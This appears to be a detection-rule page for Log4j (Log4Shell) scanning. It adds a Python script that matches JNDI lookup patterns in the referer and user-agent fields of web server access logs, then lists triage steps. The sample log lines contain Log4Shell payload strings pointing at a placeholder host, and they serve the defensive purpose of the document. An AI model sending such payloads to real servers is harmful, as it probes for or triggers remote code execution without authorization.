Log4j Scanner detected in user agent or referrer
Goal
This rule detects if your Apache or NGINX web servers are being scanned for the log4j vulnerability. The initial vulnerability was identified as CVE-2021-44228.
Strategy
This signal evaluated that jndi:(ldap OR rmi OR dns) has been detected in the HTTP header fields user agent and referrer (or referer).
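The same check applied offline to Apache/NGINX combined-format access logs, as an added example that is not Datadog's rule implementation. The log lines are constructed, and the function names, the regular expressions and the case-insensitive matching are assumptions of this example.

```python
import re

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"'
)

# Pattern from the rule's strategy: jndi:(ldap OR rmi OR dns).
# Case-insensitive matching is an assumption of this example.
JNDI = re.compile(r'jndi:(ldap|rmi|dns)', re.IGNORECASE)

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://scanner.example/a}"',
    '198.51.100.4 - - [12/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 1024 '
    '"${jndi:dns://scanner.example/b}" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Dec/2021:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 2048 '
    '"https://www.example.com/" "Mozilla/5.0"',
    'not an access log line',
]


def scan_line(line):
    """Return a finding dict if the referer or user agent matches, else None."""
    m = COMBINED.match(line)
    if m is None:
        return None  # unparseable line: skip rather than guess at fields
    hits = {}
    for field in ("user_agent", "referer"):
        found = JNDI.search(m.group(field))
        if found:
            hits[field] = found.group(1).lower()  # record which scheme was seen
    if not hits:
        return None
    return {"ip": m.group("ip"), "timestamp": m.group("ts"), "fields": hits}


def scan(lines):
    """Scan an iterable of log lines and return the list of findings."""
    return [f for f in map(scan_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```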
Triage and response
- Ensure your servers have the most recent version of log4j installed.
- Check if the "Base64 was detected in an http.user_agent or http.referrer" rule was also triggered and follow the Triage and response steps in that rule.
Note: Datadog’s The Monitor blog has published an article, “The Log4j Log4Shell vulnerability: Overview, detection, and remediation”.